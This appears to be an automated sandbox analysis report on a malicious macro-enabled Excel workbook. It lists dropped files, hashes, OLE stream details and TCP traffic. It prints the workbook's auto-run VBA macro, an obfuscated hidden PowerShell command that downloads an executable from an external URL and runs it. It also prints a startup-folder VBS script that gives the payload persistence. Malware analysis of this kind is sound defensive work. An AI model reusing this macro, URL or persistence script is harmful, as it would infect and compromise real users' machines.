                                                                                              SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                              Malicious:false
                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\tmp667.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):81
                                                                                              Entropy (8bit):4.756456874631155
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:FER/n0eFHHoXp4EaKC51Hn:FER/lFHIPaZ5t
                                                                                              MD5:DFEF3C321A0EBAB536D6E3215B1DFC8B
                                                                                              SHA1:97E8201D0952F8980C30E7BB26A6AADFED16DD8F
                                                                                              SHA-256:5143DF7EB4C435AE42D52AA0B2A295F79285D28240DFEED796CB12D68BA4A347
                                                                                              SHA-512:006A719162E465A00FB08E1F2CE19667B9A53CA91585A39CAC675EECF4037ADEB44C3285CDA7610A292C591AA1BFF7EE4F6790BB8F769BDC64F9C27F2A0D61F1
                                                                                              Malicious:true
                                                                                              Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\svcost.exe"""

                                                                                              C:\Users\user\AppData\Roaming\svcost.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\tmp667.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):262244634
                                                                                              Entropy (8bit):7.999990077927695
                                                                                              Encrypted:true
                                                                                              SSDEEP:6291456:aLL+czx+knHWnHnVeJJs5q5IEXNwNBHaH3Os:ghdnHEoUE8a+s
                                                                                              MD5:E3902A9C7AC3C2180B535F81DA7CD147
                                                                                              SHA1:D5D481B30B9580C404673FDAC260368C59DEDFC0
                                                                                              SHA-256:677CA9B5195BB7D3B063BCE9753A1EBE89EFC59FE143655E149293E38437130A
                                                                                              SHA-512:A36276CB43CCD5B5294D2A786F9FAE1931AF3E106BBD56537E43D0C1F89835BA88E55E2F7F352B4829B1A64CC582EE0E4257D96E807A3897A695F9A8067A2DB4
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g.....................J........... ... ....@.. ....................................`.................................\...O.... ..nF...........>............................................................... ............... ..H............text........ ...................... ..`.rsrc...nF... ...H..................@..@.reloc...............<..............@..B........................H........q.............................................................?.C.:....g|........>~.g?..!.....t}....]...W........>6#S....>.....`T?.(.>_'.>.......&!?.V!......>&..^..f.....O.n?T.>b,.>.......xcm?>.........7.._...h".......{..7?..&.......w..9..8f........f?.Q.>........+.d?Y.............<.'....?......r?a.G..`}>....*..>..N.G......r6a?.?.>.Y.>....z..?AH2?...>....-'....|..Yk.....g....8..7.O?.........:u>..A.....,J.>..I...n.....q.Z...a..l......PY?6..>+l.....H...../.

                                                                                              C:\Users\user\Desktop\79E20000

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Category:dropped
                                                                                              Size (bytes):449245
                                                                                              Entropy (8bit):7.993947297363596
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:w+l3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv25w:D5PBexJJF2cSwG4ofTn5w
                                                                                              MD5:285077F2B25F1501E13036863D0E1A2C
                                                                                              SHA1:102EF83C2C014C988122D76B938703311DEB631C
                                                                                              SHA-256:DD95063599D0CB5CE211D3495AF5AFEF1C6022BA8B34590F8515CE2E7B48CEAC
                                                                                              SHA-512:4F343AD7046CBC89FDBA6A46FEDD1A21F23F4634386B42DEF70C7AAB0F0CCBB90BBB9C7857D136B009957B22FE55FA904E69064DA24C1405C02E886343C685B4
                                                                                              Malicious:false
                                                                                              Preview:PK..........!.-..............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..#....(v..j.........5.&.)..3I.......c.7o.....U..dch.......i#.....QQ.`...X!......i..*F.j..t....z ...>....g...z.STg....1....-...op...T.K.^G..TT...Z.FX...}..1.a..)9...5..Fz..db5....s|A]v.ett...7(..)..&:.,.PhO....n.{..dk.z.\..s.........r?I.......b..t.....9.`.G.{.:$..u....Sn.~.\sI)#...;.:....(.X....C.h..RY9..v.&=.l2...............@$....{......D.......\.......h*l/..f......;.......PK..........!..U0#....L......._re

                                                                                              C:\Users\user\Desktop\79E20000:Zone.Identifier

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:false
                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                              C:\Users\user\Desktop\DGTCkacbSz.xls (copy)

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Category:dropped
                                                                                              Size (bytes):449245
                                                                                              Entropy (8bit):7.993947297363596
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:w+l3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv25w:D5PBexJJF2cSwG4ofTn5w
                                                                                              MD5:285077F2B25F1501E13036863D0E1A2C
                                                                                              SHA1:102EF83C2C014C988122D76B938703311DEB631C
                                                                                              SHA-256:DD95063599D0CB5CE211D3495AF5AFEF1C6022BA8B34590F8515CE2E7B48CEAC
                                                                                              SHA-512:4F343AD7046CBC89FDBA6A46FEDD1A21F23F4634386B42DEF70C7AAB0F0CCBB90BBB9C7857D136B009957B22FE55FA904E69064DA24C1405C02E886343C685B4
                                                                                              Malicious:false
                                                                                              Preview:PK..........!.-..............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..#....(v..j.........5.&.)..3I.......c.7o.....U..dch.......i#.....QQ.`...X!......i..*F.j..t....z ...>....g...z.STg....1....-...op...T.K.^G..TT...Z.FX...}..1.a..)9...5..Fz..db5....s|A]v.ett...7(..)..&:.,.PhO....n.{..dk.z.\..s.........r?I.......b..t.....9.`.G.{.:$..u....Sn.~.\sI)#...;.:....(.X....C.h..RY9..v.&=.l2...............@$....{......D.......\.......h*l/..f......;.......PK..........!..U0#....L......._re

                                                                                              C:\Users\user\Desktop\~$DGTCkacbSz.xls

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):165
                                                                                              Entropy (8bit):1.4377382811115937
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                              Malicious:false
                                                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                              C:\Users\user\Desktop\~$DGTCkacbSz.xlsx

                                                                                              Download File
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):165
                                                                                              Entropy (8bit):1.4377382811115937
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                              Malicious:true
                                                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:Microsoft Excel 2007+
                                                                                              Entropy (8bit):7.993912897429242
                                                                                              TrID:
                                                                                              • Excel Microsoft Office Open XML Format document with Macro (52504/1) 54.97%
                                                                                              • Excel Microsoft Office Open XML Format document (35004/1) 36.65%
                                                                                              • ZIP compressed archive (8000/1) 8.38%
                                                                                              File name:DGTCkacbSz.xlsx
                                                                                              File size:445'545 bytes
                                                                                              MD5:adfcfa59a06bbc5a0faa8f5b0ff663fe
                                                                                              SHA1:01d4b8e70b641863727d671e9b087633f3b3a37e
                                                                                              SHA256:88671a5d96d0741f41a8fab45db69ba8331ab55d6cc3fe0077ea3d7f30d82d39
                                                                                              SHA512:0749086410e6ebaab4a23a2eb46e0bddafa134c8a704ec6b1b860a6d9016d6a6b877c2cff6be5eb5161c214fbdf731ad002fec0ab155d1e4557ee30c5a1bf836
                                                                                              SSDEEP:12288:el3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv25EN:e5PBexJJF2cSwG4ofTn5Y
                                                                                              TLSH:7E942302D3293DCFF853537B5DD09B8480E03CD2690B245E3A1AA869659B4FF945FBAC
                                                                                              File Content Preview:PK..........!.-...............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                              File Icon

                                                                                              Icon Hash:2562ab89a7b7bfbf

                                                                                              Static OLE Info

                                                                                              General

                                                                                              Document Type:OpenXML
                                                                                              Number of OLE Files:1

                                                                                              OLE File "DGTCkacbSz.xlsx"

                                                                                              Indicators
                                                                                              Has Summary Info:
                                                                                              Application Name:
                                                                                              Encrypted Document:False
                                                                                              Contains Word Document Stream:False
                                                                                              Contains Workbook/Book Stream:True
                                                                                              Contains PowerPoint Document Stream:False
                                                                                              Contains Visio Document Stream:False
                                                                                              Contains ObjectPool Stream:False
                                                                                              Flash Objects Count:0
                                                                                              Contains VBA Macros:True
                                                                                              Summary
                                                                                              Author:Dell
                                                                                              Last Saved By:Dell2
                                                                                              Create Time:2021-08-19T14:03:52Z
                                                                                              Last Saved Time:2024-11-21T09:49:20Z
                                                                                              Creating Application:Microsoft Excel
                                                                                              Security:0
                                                                                              Document Summary
                                                                                              Thumbnail Scaling Desired:false
                                                                                              Company:
                                                                                              Contains Dirty Links:false
                                                                                              Shared Document:false
                                                                                              Changed Hyperlinks:false
                                                                                              Application Version:16.0300

                                                                                              Streams with VBA

                                                                                              VBA File Name: Sheet1.cls, Stream Size: 169
                                                                                              General
                                                                                              Stream Path:VBA/Sheet1
                                                                                              VBA File Name:Sheet1.cls
                                                                                              Stream Size:169
                                                                                              Data ASCII:. . A t t r i b u t . e V B _ N a m . e = " S h e @ e t 1 " . . . B . a s . t 0 { 0 0 0 2 0 8 2 0 - . . . F C . . . . 4 6 } . | G l o b a l . S p . a c . F a l s e . . % C r e a t a b . l . . P r e d e c $ l a . . I d . # T r . u . " E x p o s e . . . . @ T e m p l a t e D e r i v . % . C u s t o m i z . D 2
                                                                                              Data Raw:01 a5 b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 53 68 65 40 65 74 31 22 0d 0a 0a e8 42 04 61 73 02 74 30 7b 30 30 30 c0 32 30 38 32 30 2d 00 20 04 08 46 43 05 12 03 00 34 36 7d 0d 7c 47 20 6c 6f 62 61 6c 01 c4 53 70 04 61 63 01 92 46 61 6c 73 65 01 0c 25 43 72 65 61 74 61 62 02 6c 15 1f 50 72 65 64 65 63 24 6c 61 00 06 49 64 00 23 54 72 02 75 0d 22
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                              VBA File Name: ThisWorkbook.cls, Stream Size: 699
                                                                                              General
                                                                                              Stream Path:VBA/ThisWorkbook
                                                                                              VBA File Name:ThisWorkbook.cls
                                                                                              Stream Size:699
                                                                                              Data ASCII:. . A t t r i b u t . e V B _ N a m . e = " T h i . s W o r k b o o . k " . . . B a s . . 0 { 0 0 0 2 0 P 8 1 9 - . . 0 . . C # . . . . 4 6 } . | G l . o b a l . S p a c . F a l s e . % . C r e a t a b l . . . P r e d e c l . a . . I d . # T r u . " E x p o s e . . . . @ T e m p l a t @ e D e r i v . C u s t o m i z D . 2 P . . S u b . . _ O p e n ( . ) . . D i m L . x h r a x t l . A s S & n g , . s O u t p u t C . . . . H t h q . O @ b j e c t , . . E x e c . . . . . ( . . ^ p * o ^ * w
                                                                                              Data Raw:01 b7 b2 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 57 6f 72 6b 62 6f 6f 10 6b 22 0d 0a 0a 8c 42 61 73 01 02 8c 30 7b 30 30 30 32 30 50 38 31 39 2d 00 10 30 03 08 43 23 05 12 03 00 34 36 7d 0d 7c 47 6c 10 6f 62 61 6c 01 d0 53 70 61 82 63 01 92 46 61 6c 73 65 0c 25 00 43 72 65 61 74 61 62 6c 01 15 1f 50 72 65 64 65 63 6c 12 61 00 06 49 64
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim Lxhraxtl As String, sOutput As String
Dim Hthql As Object, HthqlExec As Object
Lxhraxtl = "^p*o^*w*e*r*s^^*h*e*l^*l* *^-*W*i*n*^d*o*w^*S*t*y*^l*e* *h*i*^d*d*^e*n^* *-*e*x*^e*c*u*t*^i*o*n*pol^icy* *b*yp^^ass*;* $TempFile* *=* *[*I*O*.*P*a*t*h*]*::GetTem*pFile*Name() | Ren^ame-It^em -NewName { $_ -replace 'tmp$', 'exe' } Pass*Thru; In^vo*ke-We^bRe*quest -U^ri ""https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe"" -Out*File $TempFile; St*art-Proce*ss $TempFile;"
Lxhraxtl = Replace(Lxhraxtl, "*", "")
Lxhraxtl = Replace(Lxhraxtl, "^", "")
Set Hthql = CreateObject("WScript.Shell")
Set HthqlExec = Hthql.Exec(Lxhraxtl)
End Sub

                                                                                              Streams

                                                                                              Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 474
                                                                                              General
                                                                                              Stream Path:PROJECT
                                                                                              CLSID:
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Stream Size:474
                                                                                              Entropy:5.166315308180005
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = 0 . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 7 1 7 3 D D 1 B E 1 1 B E 1 1 F E 5 1 F E 5 " . . D P B = " D 7 D 5 7 B 5 6 8 5 F A 4 1 1 7 4 1 1 7 B E E 9 4 2 1 7 2 6 8 A 9 1 0 4 2 8 F F 5 8 C E A
                                                                                              Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65
                                                                                              Stream Path: PROJECTwm, File Type: data, Stream Size: 62
                                                                                              General
                                                                                              Stream Path:PROJECTwm
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:62
                                                                                              Entropy:3.0554671543224337
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
                                                                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00
                                                                                              Stream Path: VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7
                                                                                              General
                                                                                              Stream Path:VBA/_VBA_PROJECT
                                                                                              CLSID:
                                                                                              File Type:ISO-8859 text, with no line terminators
                                                                                              Stream Size:7
                                                                                              Entropy:1.8423709931771088
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:a . . .
                                                                                              Data Raw:cc 61 ff ff 00 00 00
                                                                                              Stream Path: VBA/dir, File Type: data, Stream Size: 209
                                                                                              General
                                                                                              Stream Path:VBA/dir
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:209
                                                                                              Entropy:5.683388262349176
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . Q . T . . . " < . . . . . D . . . . . . . T . h i s W o r k b @ o o k G . . . . . . h . i . s . W . o . r . k . b . . o . . . . / 2 . / . . u H . . 1 . . . , C * " . + . . n S h e e t 1 G 7 S . e . t ! . . 2 . . 7 . .
                                                                                              Data Raw:01 cd b0 80 01 00 04 00 00 00 01 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 00 08 05 06 12 09 02 12 a5 95 1f 51 06 54 00 0c 02 22 3c 02 0a 0f 02 b6 02 44 00 13 02 07 ff ff 19 02 1d 54 00 68 69 73 57 6f 72 6b 62 40 6f 6f 6b 47 00 18 01 11 00 00 68 00 69 00 73

                                                                                              Network Behavior

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Nov 25, 2024 14:58:06.876660109 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:06.876689911 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:06.876773119 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:06.885560036 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:06.885574102 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:08.170183897 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:08.170250893 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:08.175421000 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:08.175451994 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:08.176440954 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:08.246589899 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:08.291332006 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.107733011 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.108642101 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.108691931 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.108704090 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.108727932 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.108771086 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.108814001 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.108819008 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.108833075 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.109158993 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.116890907 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.125577927 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.125642061 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.125650883 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.133562088 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.133824110 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.308749914 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.308799982 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.308953047 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.308967113 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.318717003 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.318803072 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.318866014 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.318873882 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.334919930 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.334973097 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.335038900 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.335046053 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.343030930 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.345089912 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.345098019 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.351174116 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.353351116 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.353358030 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.367439032 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.367611885 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.370383024 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.370398998 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.374511003 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.374720097 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.381390095 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.381496906 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.381550074 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.381557941 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.387816906 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.388461113 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.395616055 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.397030115 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.397037983 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.421034098 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.449033022 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.509058952 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.511257887 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.513154984 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.513168097 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.525294065 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.525409937 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.525595903 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.525604963 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.539441109 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.539530039 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.539536953 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.542814016 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.553539038 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.553549051 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.553670883 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.560647964 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.560719013 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.568223953 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.568233967 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.568310022 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.578564882 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.578576088 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.578649044 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.589266062 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.589274883 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.589342117 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.594918966 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.594930887 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.594997883 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.605616093 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.605695963 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.616300106 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.616370916 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.617189884 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.627099991 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.627167940 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.632729053 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.632783890 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.645391941 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.712830067 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.712961912 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.722826958 CET44349161172.67.129.178192.168.2.22
